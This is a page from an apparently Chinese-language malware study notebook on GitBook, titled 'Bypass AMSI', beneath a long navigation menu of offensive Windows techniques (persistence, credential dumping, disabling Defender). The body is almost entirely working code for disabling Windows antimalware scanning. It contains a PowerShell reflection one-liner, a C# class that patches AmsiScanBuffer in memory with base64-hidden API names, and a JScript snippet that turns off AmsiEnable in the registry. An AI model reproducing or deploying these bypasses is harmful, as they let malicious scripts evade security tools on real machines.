Malware Note
main
main
  • 恶意软件学习笔记
  • 权限维持
    • 服务
      • 新建服务
      • 修改服务
      • 隐藏服务
      • 劫持服务
    • 启动项
      • 注册表
      • 文件夹
    • 用户账户
      • 新建用户
      • 隐藏用户
    • DLL劫持
      • 劫持自启动程序
      • 劫持.NET程序
    • COM劫持
      • COM劫持
    • 映像劫持
      • 映像劫持
    • 计划任务
      • 新建任务
    • WMI
      • WMI事件
    • Office
      • VSTO
      • WLL/XLL
      • 模板文件
      • COM劫持
    • BITS Jobs
      • BITS
    • Rootkit
      • Rootkit
    • 未分类
      • Windows Telemetry
      • 替换文件
      • AppInit_DLLs注入
      • 粘滞键
      • cmd启动劫持
      • 屏幕保护
      • 注册SSP DLL
      • AddMonitor
      • 滥用POWERSHELL配置文件
      • W32Time
      • UWP
      • Waitfor
      • Bios
      • 劫持更新程序
      • 利用LAPS
      • SDB文件
  • 提权
    • UAC Bypass
    • 漏洞
    • 错误配置
  • 横向移动
    • WMI
    • RPC
    • DCOM
    • HASH
    • Kerberos tickets
  • 文件结构
    • Office
    • LNK
      • 钓鱼lnk
    • PE
    • CHM
      • 钓鱼chm
  • 注入
    • 注入
  • 反分析
    • 反虚拟机/沙盒
  • 获取用户密码或hash
    • SMB
    • 注入mstsc.exe
    • Mimikatz
    • NPLogonNotify
    • Tickets
  • 进程链
    • 启动进程
  • 关闭杀软
    • 关闭WD
  • AMSI
    • 绕过AMSI
  • Dump内存
    • MiniDumpWriteDump
    • Shellcode
    • SilentProcessExit
    • procdump
    • Task Manager/Process Explorer
    • Sqldumper
    • comsvcs.dll
    • WinPmem
    • ProcessDump.exe
    • Dumpert
    • BSOD
    • PPLdump
    • Hibernation
  • 木马分析
    • Stealer
      • 输入法
    • Hidden Remote
  • 常用工具
    • Untitled
  • 鬼知道有什么用的小知识
    • 鬼知道有什么用的小知识
由 GitBook 提供支持
在本页

这有帮助吗?

  1. AMSI

绕过AMSI

Powershell:

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

c#:

public class Amsi
    {
        public static void Bypass()
        {
            string x64 = "uFcA";
            x64 = x64 + "B4DD";
            string x86 = "uFcAB4";
            x86 = x86 + "DCGAA=";
            if (is64Bit())
                PatchA(Convert.FromBase64String(x64));
            else
                PatchA(Convert.FromBase64String(x86));
        }
        private static void PatchA(byte[] patch)
        {
            try
            {
                string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
                var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll
                string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
                var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
                uint oldProtect;
                Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
                Marshal.Copy(patch, 0, addr, patch.Length);
            }
            catch (Exception e)
            {
                Console.WriteLine(" [x] {0}", e.Message);
                Console.WriteLine(" [x] {0}", e.InnerException);
            }
        }
        private static bool is64Bit()
        {
            bool is64Bit = true;
            if (IntPtr.Size == 4)
                is64Bit = false;
            return is64Bit;
        }
    }
    class Win32
    {
        public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
        public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
        #region CreateAPI
        [DllImport("kernel32", SetLastError = true)]
        public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
        [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
        public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
        public static CreateApi LoadApi<CreateApi>(string name, string method)
        {
            return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
        }
        #endregion
    }

js:

var sh=new ActiveXObject('WScript.Shell');
var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
    var AmsiEnable=sh.RegRead(key);
    if(AmsiEnable!=0) {
        throw new Error(1,'');
    }
} catch(e) {
    sh.RegWrite(key,0,"REG_DWORD");
    sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
    sh.RegWrite(key,1,"REG_DWORD");
    WScript.Quit(1);
}
上一页关闭WD下一页MiniDumpWriteDump

最后更新于3年前

这有帮助吗?